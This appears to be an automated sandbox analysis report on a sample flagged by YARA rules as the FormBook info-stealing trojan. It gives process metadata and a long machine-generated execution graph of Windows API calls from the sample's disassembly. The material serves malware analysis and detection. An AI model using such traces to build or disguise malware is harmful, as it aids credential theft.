                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3983803562.0000000003360000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3981537741.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3983690192.0000000003310000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                              Reputation:moderate
                                                                                              Has exited:false

                                                                                              General

                                                                                              Target ID:8
                                                                                              Start time:09:53:26
                                                                                              Start date:08/10/2024
                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                              Imagebase:0x7ff728280000
                                                                                              File size:676'768 bytes
                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                              Has elevated privileges:false
                                                                                              Has administrator privileges:false
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:3.4%
                                                                                                Dynamic/Decrypted Code Coverage:0.4%
                                                                                                Signature Coverage:9.6%
                                                                                                Total number of Nodes:2000
                                                                                                Total number of Limit Nodes:36
                                                                                                execution_graph 86292 4010e0 86295 401100 86292->86295 86294 4010f8 86296 401113 86295->86296 86297 401184 86296->86297 86298 40114c 86296->86298 86300 401120 86296->86300 86327 401182 86296->86327 86333 401250 61 API calls setSBCS 86297->86333 86301 401151 86298->86301 86302 40119d 86298->86302 86299 40112c DefWindowProcW 86299->86294 86300->86299 86340 401000 Shell_NotifyIconW setSBCS 86300->86340 86304 401219 86301->86304 86305 40115d 86301->86305 86307 4011a3 86302->86307 86308 42afb4 86302->86308 86304->86300 86311 401225 86304->86311 86309 401163 86305->86309 86310 42b01d 86305->86310 86306 401193 86306->86294 86307->86300 86317 4011b6 KillTimer 86307->86317 86318 4011db SetTimer RegisterWindowMessageW 86307->86318 86335 40f190 10 API calls 86308->86335 86314 42afe9 86309->86314 86315 40116c 86309->86315 86310->86299 86339 4370f4 52 API calls 86310->86339 86351 468b0e 74 API calls setSBCS 86311->86351 86337 40f190 10 API calls 86314->86337 86315->86300 86322 401174 86315->86322 86316 42b04f 86341 40e0c0 86316->86341 86334 401000 Shell_NotifyIconW setSBCS 86317->86334 86318->86306 86320 401204 CreatePopupMenu 86318->86320 86320->86294 86336 45fd57 65 API calls setSBCS 86322->86336 86326 4011c9 PostQuitMessage 86326->86294 86327->86299 86328 42afe4 86328->86306 86329 42b00e 86338 401a50 329 API calls 86329->86338 86332 42afdc 86332->86299 86332->86328 86333->86306 86334->86326 86335->86306 86336->86332 86337->86329 86338->86327 86339->86327 86340->86316 86343 40e0e7 setSBCS 86341->86343 86342 40e142 86344 40e184 86342->86344 86374 4341e6 63 API calls __wcsicoll 86342->86374 86343->86342 86345 42729f DestroyIcon 86343->86345 86347 40e1a0 Shell_NotifyIconW 86344->86347 86348 4272db Shell_NotifyIconW 86344->86348 86345->86342 86352 401b80 86347->86352 86350 40e1ba 86350->86327 86351->86328 86353 401b9c 86352->86353 86373 401c7e 86352->86373 86375 4013c0 86353->86375 86356 42722b LoadStringW 86360 427246 86356->86360 86357 401bb9 86380 402160 86357->86380 86359 401bcd 86362 427258 86359->86362 86363 401bda 86359->86363 86394 40e0a0 86360->86394 86398 40d200 52 API calls 2 library calls 86362->86398 86363->86360 86364 401be4 86363->86364 86393 40d200 52 API calls 2 library calls 86364->86393 86367 427267 86368 42727b 86367->86368 86370 401bf3 setSBCS _wcscpy _wcsncpy 86367->86370 86399 40d200 52 API calls 2 library calls 86368->86399 86372 401c62 Shell_NotifyIconW 86370->86372 86371 427289 86372->86373 86373->86350 86374->86344 86400 4115d7 86375->86400 86381 426daa 86380->86381 86382 40216b _wcslen 86380->86382 86438 40c600 86381->86438 86385 402180 86382->86385 86386 40219e 86382->86386 86384 426db5 86384->86359 86437 403bd0 52 API calls moneypunct 86385->86437 86387 4013a0 52 API calls 86386->86387 86389 4021a5 86387->86389 86391 426db7 86389->86391 86392 4115d7 52 API calls 86389->86392 86390 402187 _memmove 86390->86359 86392->86390 86393->86370 86395 40e0b2 86394->86395 86396 40e0a8 86394->86396 86395->86370 86450 403c30 52 API calls _memmove 86396->86450 86398->86367 86399->86371 86402 4115e1 _malloc 86400->86402 86403 4013e4 86402->86403 86407 4115fd std::exception::exception 86402->86407 86414 4135bb 86402->86414 86411 4013a0 86403->86411 86404 41163b 86429 4180af 46 API calls std::exception::operator= 86404->86429 86406 411645 86430 418105 RaiseException 86406->86430 86407->86404 86428 41130a 51 API calls __cinit 86407->86428 86410 411656 86412 4115d7 52 API calls 86411->86412 86413 4013a7 86412->86413 86413->86356 86413->86357 86415 413638 _malloc 86414->86415 86423 4135c9 _malloc 86414->86423 86436 417f77 46 API calls __getptd_noexit 86415->86436 86416 4135d4 86416->86423 86431 418901 46 API calls 2 library calls 86416->86431 86432 418752 46 API calls 8 library calls 86416->86432 86433 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86416->86433 86419 4135f7 RtlAllocateHeap 86420 413630 86419->86420 86419->86423 86420->86402 86422 413624 86434 417f77 46 API calls __getptd_noexit 86422->86434 86423->86416 86423->86419 86423->86422 86426 413622 86423->86426 86435 417f77 46 API calls __getptd_noexit 86426->86435 86428->86404 86429->86406 86430->86410 86431->86416 86432->86416 86434->86426 86435->86420 86436->86420 86437->86390 86439 40c619 86438->86439 86440 40c60a 86438->86440 86439->86384 86440->86439 86443 4026f0 86440->86443 86442 426d7a _memmove 86442->86384 86444 426873 86443->86444 86445 4026ff 86443->86445 86446 4013a0 52 API calls 86444->86446 86445->86442 86447 42687b 86446->86447 86448 4115d7 52 API calls 86447->86448 86449 42689e _memmove 86448->86449 86449->86442 86450->86395 86451 40bd20 86452 428194 86451->86452 86453 40bd2d 86451->86453 86455 40bd43 86452->86455 86457 4281bc 86452->86457 86460 4281b2 86452->86460 86454 40bd37 86453->86454 86474 4531b1 85 API calls 5 library calls 86453->86474 86463 40bd50 86454->86463 86473 45e987 86 API calls moneypunct 86457->86473 86472 40b510 VariantClear 86460->86472 86462 4281ba 86464 426cf1 86463->86464 86465 40bd63 86463->86465 86484 44cde9 52 API calls _memmove 86464->86484 86475 40bd80 86465->86475 86468 426cfc 86470 40e0a0 52 API calls 86468->86470 86469 40bd73 86469->86455 86471 426d02 86470->86471 86472->86462 86473->86453 86474->86454 86476 40bd8e 86475->86476 86481 40bdb7 _memmove 86475->86481 86477 40bded 86476->86477 86478 40bdad 86476->86478 86476->86481 86479 4115d7 52 API calls 86477->86479 86485 402f00 86478->86485 86482 40bdf6 86479->86482 86481->86469 86482->86481 86483 4115d7 52 API calls 86482->86483 86483->86481 86484->86468 86486 402f10 86485->86486 86487 402f0c 86485->86487 86488 4115d7 52 API calls 86486->86488 86489 4268c3 86486->86489 86487->86481 86490 402f51 moneypunct _memmove 86488->86490 86490->86481 86491 425ba2 86496 40e360 86491->86496 86493 425bb4 86512 41130a 51 API calls __cinit 86493->86512 86495 425bbe 86497 4115d7 52 API calls 86496->86497 86498 40e3ec GetModuleFileNameW 86497->86498 86513 413a0e 86498->86513 86500 40e421 _wcsncat 86516 413a9e 86500->86516 86503 4115d7 52 API calls 86504 40e45e _wcscpy 86503->86504 86519 40bc70 86504->86519 86508 40e4a9 86508->86493 86509 40e4a1 _wcscat _wcslen _wcsncpy 86509->86508 86510 4115d7 52 API calls 86509->86510 86511 401c90 52 API calls 86509->86511 86510->86509 86511->86509 86512->86495 86538 413801 86513->86538 86568 419efd 86516->86568 86520 4115d7 52 API calls 86519->86520 86521 40bc98 86520->86521 86522 4115d7 52 API calls 86521->86522 86523 40bca6 86522->86523 86524 40e4c0 86523->86524 86580 403350 86524->86580 86526 40e4cb RegOpenKeyExW 86527 427190 RegQueryValueExW 86526->86527 86528 40e4eb 86526->86528 86529 4271b0 86527->86529 86530 42721a RegCloseKey 86527->86530 86528->86509 86531 4115d7 52 API calls 86529->86531 86530->86509 86532 4271cb 86531->86532 86587 43652f 52 API calls 86532->86587 86534 4271d8 RegQueryValueExW 86535 4271f7 86534->86535 86537 42720e 86534->86537 86536 402160 52 API calls 86535->86536 86536->86537 86537->86530 86539 41389e 86538->86539 86540 41381a 86538->86540 86541 4139e8 86539->86541 86543 413a00 86539->86543 86540->86539 86553 41388a 86540->86553 86560 419e30 46 API calls __write_nolock 86540->86560 86565 417f77 46 API calls __getptd_noexit 86541->86565 86567 417f77 46 API calls __getptd_noexit 86543->86567 86544 4139ed 86566 417f25 10 API calls __write_nolock 86544->86566 86548 41396c 86548->86539 86549 413967 86548->86549 86551 41397a 86548->86551 86549->86500 86550 413929 86550->86539 86552 413945 86550->86552 86562 419e30 46 API calls __write_nolock 86550->86562 86564 419e30 46 API calls __write_nolock 86551->86564 86552->86539 86552->86549 86556 41395b 86552->86556 86553->86539 86559 413909 86553->86559 86561 419e30 46 API calls __write_nolock 86553->86561 86563 419e30 46 API calls __write_nolock 86556->86563 86559->86548 86559->86550 86560->86553 86561->86559 86562->86552 86563->86549 86564->86549 86565->86544 86566->86549 86567->86549 86569 419f13 86568->86569 86570 419f0e 86568->86570 86577 417f77 46 API calls __getptd_noexit 86569->86577 86570->86569 86574 419f2b 86570->86574 86572 419f18 86578 417f25 10 API calls __write_nolock 86572->86578 86576 40e454 86574->86576 86579 417f77 46 API calls __getptd_noexit 86574->86579 86576->86503 86577->86572 86578->86576 86579->86572 86581 403367 86580->86581 86582 403358 86580->86582 86583 4115d7 52 API calls 86581->86583 86582->86526 86584 403370 86583->86584 86585 4115d7 52 API calls 86584->86585 86586 40339e 86585->86586 86586->86526 86587->86534 86588 416454 86625 416c70 86588->86625 86590 416460 GetStartupInfoW 86591 416474 86590->86591 86626 419d5a HeapCreate 86591->86626 86593 4164cd 86594 4164d8 86593->86594 86709 41642b 46 API calls 3 library calls 86593->86709 86627 417c20 GetModuleHandleW 86594->86627 86597 4164de 86598 4164e9 __RTC_Initialize 86597->86598 86710 41642b 46 API calls 3 library calls 86597->86710 86646 41aaa1 GetStartupInfoW 86598->86646 86602 416503 GetCommandLineW 86659 41f584 GetEnvironmentStringsW 86602->86659 86606 416513 86665 41f4d6 GetModuleFileNameW 86606->86665 86608 41651d 86609 416528 86608->86609 86712 411924 46 API calls 3 library calls 86608->86712 86669 41f2a4 86609->86669 86612 41652e 86613 416539 86612->86613 86713 411924 46 API calls 3 library calls 86612->86713 86683 411703 86613->86683 86616 416541 86618 41654c __wwincmdln 86616->86618 86714 411924 46 API calls 3 library calls 86616->86714 86687 40d6b0 86618->86687 86621 41657c 86716 411906 46 API calls _doexit 86621->86716 86624 416581 _flsall 86625->86590 86626->86593 86628 417c34 86627->86628 86629 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86627->86629 86717 4178ff 49 API calls _free 86628->86717 86631 417c87 TlsAlloc 86629->86631 86634 417cd5 TlsSetValue 86631->86634 86635 417d96 86631->86635 86632 417c39 86632->86597 86634->86635 86636 417ce6 __init_pointers 86634->86636 86635->86597 86718 418151 InitializeCriticalSectionAndSpinCount 86636->86718 86638 417d91 86726 4178ff 49 API calls _free 86638->86726 86640 417d2a 86640->86638 86719 416b49 86640->86719 86643 417d76 86725 41793c 46 API calls 4 library calls 86643->86725 86645 417d7e GetCurrentThreadId 86645->86635 86647 416b49 __calloc_crt 46 API calls 86646->86647 86656 41aabf 86647->86656 86648 41ac6a GetStdHandle 86653 41ac34 86648->86653 86649 416b49 __calloc_crt 46 API calls 86649->86656 86650 41acce SetHandleCount 86658 4164f7 86650->86658 86651 41ac7c GetFileType 86651->86653 86652 41abb4 86652->86653 86654 41abe0 GetFileType 86652->86654 86655 41abeb InitializeCriticalSectionAndSpinCount 86652->86655 86653->86648 86653->86650 86653->86651 86657 41aca2 InitializeCriticalSectionAndSpinCount 86653->86657 86654->86652 86654->86655 86655->86652 86655->86658 86656->86649 86656->86652 86656->86653 86656->86658 86657->86653 86657->86658 86658->86602 86711 411924 46 API calls 3 library calls 86658->86711 86660 41f595 86659->86660 86661 41f599 86659->86661 86660->86606 86736 416b04 86661->86736 86663 41f5bb _memmove 86664 41f5c2 FreeEnvironmentStringsW 86663->86664 86664->86606 86666 41f50b _wparse_cmdline 86665->86666 86667 416b04 __malloc_crt 46 API calls 86666->86667 86668 41f54e _wparse_cmdline 86666->86668 86667->86668 86668->86608 86670 41f2bc _wcslen 86669->86670 86674 41f2b4 86669->86674 86671 416b49 __calloc_crt 46 API calls 86670->86671 86676 41f2e0 _wcslen 86671->86676 86672 41f336 86743 413748 86672->86743 86674->86612 86675 416b49 __calloc_crt 46 API calls 86675->86676 86676->86672 86676->86674 86676->86675 86677 41f35c 86676->86677 86680 41f373 86676->86680 86742 41ef12 46 API calls __write_nolock 86676->86742 86678 413748 _free 46 API calls 86677->86678 86678->86674 86749 417ed3 86680->86749 86682 41f37f 86682->86612 86684 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86683->86684 86686 411750 __IsNonwritableInCurrentImage 86684->86686 86768 41130a 51 API calls __cinit 86684->86768 86686->86616 86688 42e2f3 86687->86688 86689 40d6cc 86687->86689 86769 408f40 86689->86769 86691 40d707 86773 40ebb0 86691->86773 86694 40d737 86776 411951 86694->86776 86699 40d751 86788 40f4e0 SystemParametersInfoW SystemParametersInfoW 86699->86788 86701 40d75f 86789 40d590 GetCurrentDirectoryW 86701->86789 86703 40d767 SystemParametersInfoW 86704 40d78d 86703->86704 86705 408f40 VariantClear 86704->86705 86706 40d79d 86705->86706 86707 408f40 VariantClear 86706->86707 86708 40d7a6 86707->86708 86708->86621 86715 4118da 46 API calls _doexit 86708->86715 86709->86594 86710->86598 86715->86621 86716->86624 86717->86632 86718->86640 86721 416b52 86719->86721 86722 416b8f 86721->86722 86723 416b70 Sleep 86721->86723 86727 41f677 86721->86727 86722->86638 86722->86643 86724 416b85 86723->86724 86724->86721 86724->86722 86725->86645 86726->86635 86728 41f683 86727->86728 86733 41f69e _malloc 86727->86733 86729 41f68f 86728->86729 86728->86733 86735 417f77 46 API calls __getptd_noexit 86729->86735 86730 41f6b1 HeapAlloc 86732 41f6d8 86730->86732 86730->86733 86732->86721 86733->86730 86733->86732 86734 41f694 86734->86721 86735->86734 86738 416b0d 86736->86738 86737 4135bb _malloc 45 API calls 86737->86738 86738->86737 86739 416b43 86738->86739 86740 416b24 Sleep 86738->86740 86739->86663 86741 416b39 86740->86741 86741->86738 86741->86739 86742->86676 86744 41377c _free 86743->86744 86745 413753 RtlFreeHeap 86743->86745 86744->86674 86745->86744 86746 413768 86745->86746 86752 417f77 46 API calls __getptd_noexit 86746->86752 86748 41376e GetLastError 86748->86744 86753 417daa 86749->86753 86752->86748 86754 417dc9 setSBCS __call_reportfault 86753->86754 86755 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86754->86755 86758 417eb5 __call_reportfault 86755->86758 86757 417ed1 GetCurrentProcess TerminateProcess 86757->86682 86759 41a208 86758->86759 86760 41a210 86759->86760 86761 41a212 IsDebuggerPresent 86759->86761 86760->86757 86767 41fe19 86761->86767 86764 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86765 421ff0 __call_reportfault 86764->86765 86766 421ff8 GetCurrentProcess TerminateProcess 86764->86766 86765->86766 86766->86757 86767->86764 86768->86686 86770 408f48 moneypunct 86769->86770 86771 4265c7 VariantClear 86770->86771 86772 408f55 moneypunct 86770->86772 86771->86772 86772->86691 86829 40ebd0 86773->86829 86833 4182cb 86776->86833 86778 41195e 86840 4181f2 LeaveCriticalSection 86778->86840 86780 40d748 86781 4119b0 86780->86781 86782 4119d6 86781->86782 86783 4119bc 86781->86783 86782->86699 86783->86782 86875 417f77 46 API calls __getptd_noexit 86783->86875 86785 4119c6 86876 417f25 10 API calls __write_nolock 86785->86876 86787 4119d1 86787->86699 86788->86701 86877 401f20 86789->86877 86791 40d5b6 IsDebuggerPresent 86792 40d5c4 86791->86792 86793 42e1bb MessageBoxA 86791->86793 86794 42e1d4 86792->86794 86795 40d5e3 86792->86795 86793->86794 87049 403a50 52 API calls 3 library calls 86794->87049 86947 40f520 86795->86947 86799 40d5fd GetFullPathNameW 86959 401460 86799->86959 86801 40d63b 86802 40d643 86801->86802 86803 42e231 SetCurrentDirectoryW 86801->86803 86804 40d64c 86802->86804 87050 432fee 6 API calls 86802->87050 86803->86802 86974 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86804->86974 86807 42e252 86807->86804 86809 42e25a GetModuleFileNameW 86807->86809 86811 42e274 86809->86811 86812 42e2cb GetForegroundWindow ShellExecuteW 86809->86812 87051 401b10 86811->87051 86814 40d688 86812->86814 86813 40d656 86816 40d669 86813->86816 86817 40e0c0 74 API calls 86813->86817 86821 40d692 SetCurrentDirectoryW 86814->86821 86982 4091e0 86816->86982 86817->86816 86821->86703 86823 42e28d 87058 40d200 52 API calls 2 library calls 86823->87058 86826 42e299 GetForegroundWindow ShellExecuteW 86827 42e2c6 86826->86827 86827->86814 86828 40ec00 LoadLibraryA GetProcAddress 86828->86694 86830 40d72e 86829->86830 86831 40ebd6 LoadLibraryA 86829->86831 86830->86694 86830->86828 86831->86830 86832 40ebe7 GetProcAddress 86831->86832 86832->86830 86834 4182e0 86833->86834 86835 4182f3 EnterCriticalSection 86833->86835 86841 418209 86834->86841 86835->86778 86837 4182e6 86837->86835 86868 411924 46 API calls 3 library calls 86837->86868 86840->86780 86842 418215 _flsall 86841->86842 86843 418225 86842->86843 86844 41823d 86842->86844 86869 418901 46 API calls 2 library calls 86843->86869 86846 416b04 __malloc_crt 45 API calls 86844->86846 86852 41824b _flsall 86844->86852 86848 418256 86846->86848 86847 41822a 86870 418752 46 API calls 8 library calls 86847->86870 86850 41825d 86848->86850 86851 41826c 86848->86851 86872 417f77 46 API calls __getptd_noexit 86850->86872 86855 4182cb __lock 45 API calls 86851->86855 86852->86837 86853 418231 86871 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86853->86871 86857 418273 86855->86857 86859 4182a6 86857->86859 86860 41827b InitializeCriticalSectionAndSpinCount 86857->86860 86861 413748 _free 45 API calls 86859->86861 86862 418297 86860->86862 86863 41828b 86860->86863 86861->86862 86874 4182c2 LeaveCriticalSection _doexit 86862->86874 86864 413748 _free 45 API calls 86863->86864 86866 418291 86864->86866 86873 417f77 46 API calls __getptd_noexit 86866->86873 86869->86847 86870->86853 86872->86852 86873->86862 86874->86852 86875->86785 86876->86787 87059 40e6e0 86877->87059 86881 401f41 GetModuleFileNameW 87077 410100 86881->87077 86883 401f5c 87089 410960 86883->87089 86886 401b10 52 API calls 86887 401f81 86886->86887 87092 401980 86887->87092 86889 401f8e 86890 408f40 VariantClear 86889->86890 86891 401f9d 86890->86891 86892 401b10 52 API calls 86891->86892 86893 401fb4 86892->86893 86894 401980 53 API calls 86893->86894 86895 401fc3 86894->86895 86896 401b10 52 API calls 86895->86896 86897 401fd2 86896->86897 87100 40c2c0 86897->87100 86899 401fe1 86900 40bc70 52 API calls 86899->86900 86901 401ff3 86900->86901 87118 401a10 86901->87118 86903 401ffe 87125 4114ab 86903->87125 86906 428b05 86908 401a10 52 API calls 86906->86908 86907 402017 86909 4114ab __wcsicoll 58 API calls 86907->86909 86910 428b18 86908->86910 86911 402022 86909->86911 86913 401a10 52 API calls 86910->86913 86911->86910 86912 40202d 86911->86912 86914 4114ab __wcsicoll 58 API calls 86912->86914 86915 428b33 86913->86915 86916 402038 86914->86916 86918 428b3b GetModuleFileNameW 86915->86918 86917 402043 86916->86917 86916->86918 86919 4114ab __wcsicoll 58 API calls 86917->86919 86920 401a10 52 API calls 86918->86920 86921 40204e 86919->86921 86922 428b6c 86920->86922 86923 402092 86921->86923 86926 428b90 _wcscpy 86921->86926 86929 401a10 52 API calls 86921->86929 86924 40e0a0 52 API calls 86922->86924 86925 4020a3 86923->86925 86923->86926 86927 428b7a 86924->86927 86928 428bc6 86925->86928 87133 40e830 53 API calls 86925->87133 86934 401a10 52 API calls 86926->86934 86930 401a10 52 API calls 86927->86930 86933 402073 _wcscpy 86929->86933 86931 428b88 86930->86931 86931->86926 86937 401a10 52 API calls 86933->86937 86942 4020d0 86934->86942 86935 4020bb 87134 40cf00 53 API calls 86935->87134 86937->86923 86938 4020c6 86939 408f40 VariantClear 86938->86939 86939->86942 86940 402110 86944 408f40 VariantClear 86940->86944 86942->86940 86945 401a10 52 API calls 86942->86945 87135 40cf00 53 API calls 86942->87135 87136 40e6a0 53 API calls 86942->87136 86946 402120 moneypunct 86944->86946 86945->86942 86946->86791 86948 4295c9 setSBCS 86947->86948 86949 40f53c 86947->86949 86951 4295d9 GetOpenFileNameW 86948->86951 87815 410120 86949->87815 86951->86949 86954 40d5f5 86951->86954 86952 40f545 87819 4102b0 SHGetMalloc 86952->87819 86954->86799 86954->86801 86955 40f54c 87824 410190 GetFullPathNameW 86955->87824 86957 40f559 87835 40f570 86957->87835 87897 402400 86959->87897 86961 40146f 86965 428c29 _wcscat 86961->86965 87906 401500 86961->87906 86963 40147c 86963->86965 87914 40d440 86963->87914 86966 401489 86966->86965 86967 401491 GetFullPathNameW 86966->86967 86968 402160 52 API calls 86967->86968 86969 4014bb 86968->86969 86970 402160 52 API calls 86969->86970 86971 4014c8 86970->86971 86971->86965 86972 402160 52 API calls 86971->86972 86973 4014ee 86972->86973 86973->86801 86975 428361 86974->86975 86976 4103fc LoadImageW RegisterClassExW 86974->86976 87934 44395e EnumResourceNamesW LoadImageW 86975->87934 87933 410490 7 API calls 86976->87933 86979 428368 86980 40d651 86981 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86980->86981 86981->86813 86983 409202 86982->86983 86984 42d7ad 86982->86984 87042 409216 moneypunct 86983->87042 88197 410940 329 API calls 86983->88197 88200 45e737 90 API calls 3 library calls 86984->88200 86987 409386 86988 40939c 86987->86988 88198 40f190 10 API calls 86987->88198 86988->86814 87048 401000 Shell_NotifyIconW setSBCS 86988->87048 86990 4095b2 86990->86988 86992 4095bf 86990->86992 86991 409253 PeekMessageW 86991->87042 88199 401a50 329 API calls 86992->88199 86994 40d410 VariantClear 86994->87042 86995 42d8cd Sleep 86995->87042 86996 4095c6 LockWindowUpdate DestroyWindow GetMessageW 86996->86988 86999 4095f9 86996->86999 86998 42e13b 88218 40d410 VariantClear 86998->88218 87002 42e158 TranslateMessage DispatchMessageW GetMessageW 86999->87002 87002->87002 87003 42e188 87002->87003 87003->86988 87005 409567 PeekMessageW 87005->87042 87007 44c29d 52 API calls 87047 4094e0 87007->87047 87008 46f3c1 107 API calls 87008->87042 87009 40e0a0 52 API calls 87009->87042 87010 46fdbf 108 API calls 87010->87047 87011 42dcd2 WaitForSingleObject 87016 42dcf0 GetExitCodeProcess CloseHandle 87011->87016 87011->87042 87012 409551 TranslateMessage DispatchMessageW 87012->87005 87014 42dd3d Sleep 87014->87047 87015 47d33e 307 API calls 87015->87042 88207 40d410 VariantClear 87016->88207 87019 4094cf Sleep 87019->87047 87020 40c620 timeGetTime 87020->87047 87023 42d94d timeGetTime 88203 465124 53 API calls 87023->88203 87027 465124 53 API calls 87027->87047 87028 42dd89 CloseHandle 87028->87047 87029 408f40 VariantClear 87029->87047 87031 42de19 GetExitCodeProcess CloseHandle 87031->87047 87034 42de88 Sleep 87034->87042 87037 45e737 90 API calls 87037->87042 87040 42e0cc VariantClear 87040->87042 87041 408f40 VariantClear 87041->87042 87042->86987 87042->86991 87042->86994 87042->86995 87042->86998 87042->87005 87042->87008 87042->87009 87042->87011 87042->87012 87042->87014 87042->87015 87042->87019 87042->87023 87042->87037 87042->87040 87042->87041 87042->87047 87935 4091b0 87042->87935 87993 40afa0 87042->87993 88019 408fc0 87042->88019 88054 408cc0 87042->88054 88068 4096a0 87042->88068 88195 40d150 TranslateAcceleratorW 87042->88195 88196 40d170 IsDialogMessageW GetClassLongW 87042->88196 88201 465124 53 API calls 87042->88201 88202 40c620 timeGetTime 87042->88202 88217 40e270 VariantClear moneypunct 87042->88217 87043 401b10 52 API calls 87043->87047 87045 401980 53 API calls 87045->87047 87047->87007 87047->87010 87047->87020 87047->87027 87047->87028 87047->87029 87047->87031 87047->87034 87047->87042 87047->87043 87047->87045 88204 45178a 54 API calls 87047->88204 88205 47d33e 329 API calls 87047->88205 88206 453bc6 54 API calls 87047->88206 88208 40d410 VariantClear 87047->88208 88209 443d19 67 API calls _wcslen 87047->88209 88210 4574b4 VariantClear 87047->88210 88211 403cd0 87047->88211 88215 4731e1 VariantClear 87047->88215 88216 4331a2 6 API calls 87047->88216 87048->86814 87049->86801 87050->86807 87052 401b16 _wcslen 87051->87052 87053 4115d7 52 API calls 87052->87053 87056 401b63 87052->87056 87054 401b4b _memmove 87053->87054 87055 4115d7 52 API calls 87054->87055 87055->87056 87057 40d200 52 API calls 2 library calls 87056->87057 87057->86823 87058->86826 87060 40bc70 52 API calls 87059->87060 87061 401f31 87060->87061 87062 402560 87061->87062 87063 40256d __write_nolock 87062->87063 87064 402160 52 API calls 87063->87064 87066 402593 87064->87066 87076 4025bd 87066->87076 87137 401c90 87066->87137 87067 4026f0 52 API calls 87067->87076 87068 4026a7 87069 401b10 52 API calls 87068->87069 87074 4026db 87068->87074 87071 4026d1 87069->87071 87070 401b10 52 API calls 87070->87076 87141 40d7c0 52 API calls 2 library calls 87071->87141 87072 401c90 52 API calls 87072->87076 87074->86881 87076->87067 87076->87068 87076->87070 87076->87072 87140 40d7c0 52 API calls 2 library calls 87076->87140 87142 40f760 87077->87142 87080 410118 87080->86883 87082 42805d 87083 42806a 87082->87083 87198 431e58 87082->87198 87085 413748 _free 46 API calls 87083->87085 87086 428078 87085->87086 87087 431e58 82 API calls 87086->87087 87088 428084 87087->87088 87088->86883 87090 4115d7 52 API calls 87089->87090 87091 401f74 87090->87091 87091->86886 87093 4019a3 87092->87093 87094 401985 87092->87094 87093->87094 87095 4019b8 87093->87095 87097 40199f 87094->87097 87803 403e10 53 API calls 87094->87803 87804 403e10 53 API calls 87095->87804 87097->86889 87098 4019c4 87098->86889 87101 40c2c7 87100->87101 87102 40c30e 87100->87102 87105 40c2d3 87101->87105 87106 426c79 87101->87106 87103 40c315 87102->87103 87104 426c2b 87102->87104 87107 40c321 87103->87107 87108 426c5a 87103->87108 87110 426c4b 87104->87110 87111 426c2e 87104->87111 87805 403ea0 52 API calls __cinit 87105->87805 87810 4534e3 52 API calls 87106->87810 87806 403ea0 52 API calls __cinit 87107->87806 87809 4534e3 52 API calls 87108->87809 87808 4534e3 52 API calls 87110->87808 87114 40c2de 87111->87114 87807 4534e3 52 API calls 87111->87807 87114->86899 87119 401a30 87118->87119 87120 401a17 87118->87120 87122 402160 52 API calls 87119->87122 87121 401a2d 87120->87121 87811 403c30 52 API calls _memmove 87120->87811 87121->86903 87124 401a3d 87122->87124 87124->86903 87126 411523 87125->87126 87127 4114ba 87125->87127 87814 4113a8 58 API calls 3 library calls 87126->87814 87130 40200c 87127->87130 87812 417f77 46 API calls __getptd_noexit 87127->87812 87130->86906 87130->86907 87131 4114c6 87813 417f25 10 API calls __write_nolock 87131->87813 87133->86935 87134->86938 87135->86942 87136->86942 87138 4026f0 52 API calls 87137->87138 87139 401c97 87138->87139 87139->87066 87140->87076 87141->87074 87202 40f6f0 87142->87202 87144 40f77b _strcat moneypunct 87210 40f850 87144->87210 87149 427c2a 87239 414d04 87149->87239 87151 40f7fc 87151->87149 87152 40f804 87151->87152 87226 414a46 87152->87226 87156 40f80e 87156->87080 87161 4528bd 87156->87161 87158 427c59 87245 414fe2 87158->87245 87160 427c79 87162 4150d1 _fseek 81 API calls 87161->87162 87163 452930 87162->87163 87745 452719 87163->87745 87166 452948 87166->87082 87167 414d04 __fread_nolock 61 API calls 87168 452966 87167->87168 87169 414d04 __fread_nolock 61 API calls 87168->87169 87170 452976 87169->87170 87171 414d04 __fread_nolock 61 API calls 87170->87171 87172 45298f 87171->87172 87173 414d04 __fread_nolock 61 API calls 87172->87173 87174 4529aa 87173->87174 87175 4150d1 _fseek 81 API calls 87174->87175 87176 4529c4 87175->87176 87177 4135bb _malloc 46 API calls 87176->87177 87178 4529cf 87177->87178 87179 4135bb _malloc 46 API calls 87178->87179 87180 4529db 87179->87180 87181 414d04 __fread_nolock 61 API calls 87180->87181 87182 4529ec 87181->87182 87183 44afef GetSystemTimeAsFileTime 87182->87183 87184 452a00 87183->87184 87185 452a36 87184->87185 87186 452a13 87184->87186 87188 452aa5 87185->87188 87189 452a3c 87185->87189 87187 413748 _free 46 API calls 87186->87187 87191 452a1c 87187->87191 87190 413748 _free 46 API calls 87188->87190 87751 44b1a9 87189->87751 87193 452aa3 87190->87193 87194 413748 _free 46 API calls 87191->87194 87193->87082 87196 452a25 87194->87196 87195 452a9d 87197 413748 _free 46 API calls 87195->87197 87196->87082 87197->87193 87199 431e64 87198->87199 87200 431e6a 87198->87200 87201 414a46 __fcloseall 82 API calls 87199->87201 87200->87083 87201->87200 87203 425de2 87202->87203 87204 40f6fc 